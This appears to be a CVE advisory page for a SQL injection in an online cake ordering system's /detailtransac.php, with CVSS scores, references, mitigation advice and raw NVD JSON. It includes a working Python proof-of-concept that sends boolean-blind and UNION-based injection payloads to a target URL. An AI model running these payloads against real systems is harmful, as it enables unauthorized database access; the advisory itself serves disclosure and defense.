Security Vulnerability Report
CVE-2025-15167 CVSS 7.3 HIGH

CVE-2025-15167

Published: 2025-12-29 03:15:42
Last Modified: 2026-04-29 01:00:02

Description

A SQL injection vulnerability has been identified in itsourcecode Online Cake Ordering System 1.0, in an unspecified function of the file /detailtransac.php. Manipulating the argument `ID` allows attacker-supplied input to reach a SQL query unsanitised (CWE-89). The attack can be launched remotely; the CVSS vector below (PR:N, UI:N) indicates that no authentication or user interaction is required. An exploit has been publicly disclosed and may be in use.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Note: the 7.3 / HIGH figure above is the VulDB (secondary) v3.1 assessment. The NVD primary v3.1 assessment in the raw data below is CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H — 9.8 CRITICAL — and the VulDB v4.0 score is 5.5 MEDIUM. Prioritise according to the rating your vulnerability-management process keys on; many tools report the NVD primary score, so this issue may surface as CRITICAL rather than HIGH.

Configurations (Affected Products)

cpe:2.3:a:admerc:online_cake_ordering_system:1.0:*:*:*:*:*:*:* - VULNERABLE
itsourcecode Online Cake Ordering System 1.0
Note: the CPE vendor field is `admerc`, not `itsourcecode`; asset inventories or scanners that match on the vendor string should account for this mismatch or the affected product will not be flagged.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Run it solely against systems you own or have explicit written permission to test: the payloads below send attacker-controlled SQL to the target and the UNION probe reads data from its database.
python
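import sys

import requests

# CVE-2025-15167 SQL Injection PoC
# Target: itsourcecode Online Cake Ordering System 1.0
# Vulnerability: SQL Injection in /detailtransac.php, `id` parameter
#
# The advisory names the argument "ID"; this PoC (like the original) sends it
# as `id`. PHP's $_GET keys are case-sensitive, so confirm the exact parameter
# name against the application source before trusting a negative result.

# Upper bound on every request so a hung target cannot stall the run.
REQUEST_TIMEOUT = 10


def exploit_sqli(target_url, payload):
    """Send one GET to /detailtransac.php with *payload* as the ``id`` value.

    The payload is passed via ``params=`` so that spaces, quotes and ``#``
    are URL-encoded by ``requests`` rather than interpolated raw into the
    URL (a raw ``#`` would be treated as a fragment and silently dropped).

    Returns the response body as text, or ``None`` if the request failed
    (connection error, timeout, etc.). The error is printed, not raised.
    """
    vuln_url = f"{target_url}/detailtransac.php"
    try:
        response = requests.get(
            vuln_url, params={"id": payload}, timeout=REQUEST_TIMEOUT
        )
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None
    return response.text


def test_boolean_blind_injection(target_url):
    """Probe for boolean-based blind SQL injection on the ``id`` parameter.

    Sends a tautology (``1=1``) and a contradiction (``1=2``) and reports the
    parameter as a candidate when the two response bodies differ.

    Returns ``True`` when a difference is observed, else ``False``.

    NOTE(review): a whole-body comparison is a weak oracle. Any dynamic
    content (timestamps, CSRF tokens, session-specific markup) makes the two
    bodies differ even on a non-vulnerable target, so ``True`` here is a
    candidate, not a confirmation. Cross-check by repeating the same payload
    twice and/or comparing against the plain ``id=1`` baseline.
    """
    true_payload = "1' AND 1=1 -- -"
    false_payload = "1' AND 1=2 -- -"

    print("[*] Testing boolean blind injection...")
    true_resp = exploit_sqli(target_url, true_payload)
    false_resp = exploit_sqli(target_url, false_payload)

    # Both requests must have completed; a failed request tells us nothing.
    # An empty body is still a valid observation, so only None is excluded.
    if true_resp is None or false_resp is None:
        return False
    if true_resp != false_resp:
        print("[+] Responses differ - boolean blind injection likely (verify against baseline)")
        return True
    return False


def extract_database_info(target_url):
    """Send a UNION-based probe that selects ``@@version`` into column 2.

    Returns the raw response body (or ``None`` on request failure). Nothing
    here parses the body; the operator must locate the version string in the
    returned HTML.

    NOTE(review): the five-column UNION (``NULL,@@version,NULL,NULL,NULL``)
    is inherited from the original PoC. The column count and which column is
    reflected into the page are assumptions about the vulnerable query, not
    facts established by the advisory; an SQL error or an unchanged page does
    not by itself mean the target is not injectable.
    """
    version_payload = "1' UNION SELECT NULL,@@version,NULL,NULL,NULL -- -"

    print("[*] Extracting database information...")
    version_result = exploit_sqli(target_url, version_payload)
    if version_result is not None:
        # A body came back; that alone does not prove the UNION executed.
        print("[*] Response received for @@version probe; inspect the body for the version string")
    return version_result


def main(argv=None):
    """CLI entry point: ``python cve-2025-15167.py <target_url>``.

    Runs the boolean-blind probe and then the UNION version probe against
    the given base URL (trailing slash stripped). Exits with status 1 when no
    target is supplied.
    """
    args = sys.argv if argv is None else argv
    if len(args) < 2:
        print("Usage: python cve-2025-15167.py <target_url>")
        print("Example: python cve-2025-15167.py http://target.com/cakeshop")
        sys.exit(1)

    target = args[1].rstrip('/')
    print(f"[*] Target: {target}")
    print("[*] CVE-2025-15167 SQL Injection PoC")

    # Detection first, then the single information probe; neither result
    # gates the other, matching the original script's flow.
    test_boolean_blind_injection(target)
    extract_database_info(target)


if __name__ == "__main__":
    main()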

References

- https://github.com/LaneyYu/cve/issues/6 (Exploit, Issue Tracking)
- https://itsourcecode.com/ (Product)
- https://vuldb.com/?ctiid.338546 (Permissions Required, VDB Entry)
- https://vuldb.com/?id.338546 (Third Party Advisory, VDB Entry)
- https://vuldb.com/?submit.721109 (Third Party Advisory, VDB Entry)

No reference tagged as a vendor patch is listed, so mitigation is left to operators: parameterise the query behind /detailtransac.php (or validate `ID` as an integer before use) and restrict network access to the application until a fixed release is available.

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15167", "sourceIdentifier": "[email protected]", "published": "2025-12-29T03:15:41.660", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in itsourcecode Online Cake Ordering System 1.0. This impacts an unknown function of the file /detailtransac.php. This manipulation of the argument ID causes sql injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:admerc:online_cake_ordering_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": 
"6990FB82-E8CB-4B16-B293-4DDDF0627D47"}]}]}], "references": [{"url": "https://github.com/LaneyYu/cve/issues/6", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.338546", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338546", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.721109", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}